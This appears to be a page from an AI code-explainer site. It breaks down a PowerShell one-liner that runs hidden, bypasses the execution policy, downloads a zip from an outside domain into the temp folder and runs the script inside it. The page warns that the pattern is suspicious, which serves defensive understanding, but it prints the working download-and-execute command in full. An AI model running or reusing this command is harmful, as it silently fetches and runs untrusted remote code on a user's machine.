This PowerShell code appears to download and execute a script...

June 29, 2025 at 06:04 PM

powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"

This PowerShell code appears to download and execute a script from an external source, which is a common pattern used in malicious or unauthorized activities. Here's a breakdown of what it does:

1. powershell -w h -NoP -NonI -Ep Bypass:

  • -w h: Starts a PowerShell window in hidden mode so the user doesn't see it.
  • -NoP: Disables the PowerShell profile from loading to ensure a faster and cleaner execution.
  • -NonI: Runs PowerShell in a non-interactive mode.
  • -Ep Bypass: Bypasses the PowerShell script execution policy, allowing scripts to run regardless of system policy restrictions.

2. $D="$env:tmp":

  • Sets the variable $D to the temporary directory of the system (retrieved from the environment variable $env:tmp).

3. iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip":

  • Uses the Invoke-WebRequest (iwr) cmdlet to download a file from https://jakoby.lol/1ae.
  • Saves the downloaded file (likely a ZIP archive) to the temporary directory as hg.zip.

4. Expand-Archive "$D\hg.zip" -Des $D -Force:

  • Extracts the contents of the downloaded ZIP file (hg.zip) into the temporary directory ($D).
  • The -Force flag forces the extraction, overwriting files if they already exist.

5. . "$D\hg\main.ps1":

  • Executes the PowerShell script main.ps1 located in the extracted folder (hg) in the temporary directory.
  • The . (dot-sourcing) ensures the script runs in the current PowerShell session.

What does this overall script do?

It:

  1. Sets up the environment and ensures the script runs silently without user detection.
  2. Downloads an archive (ZIP) from an external URL (https://jakoby.lol/1ae).
  3. Extracts the archive to the system's temporary directory.
  4. Runs a PowerShell script (main.ps1) from the extracted archive.

Possible Concerns:

  • The URL points to an external source, and there is no verification or validation of the contents. If the file contains malicious code, this script could compromise the system by executing code from an untrusted source.
  • It bypasses system security measures like the execution policy and runs hidden, which are often characteristics of malicious scripts.

Recommendation:

If this script was found in your system or is being executed without your knowledge, treat it as suspicious and investigate further. Avoid running such scripts unless their source and purpose are fully trusted and verified.

Generate your own explanations
Download our vscode extension
Read other generated explanations

Built by @thebuilderjr
Sponsored by beam analytics
Read our terms and privacy policy
Forked from openai-quickstart-node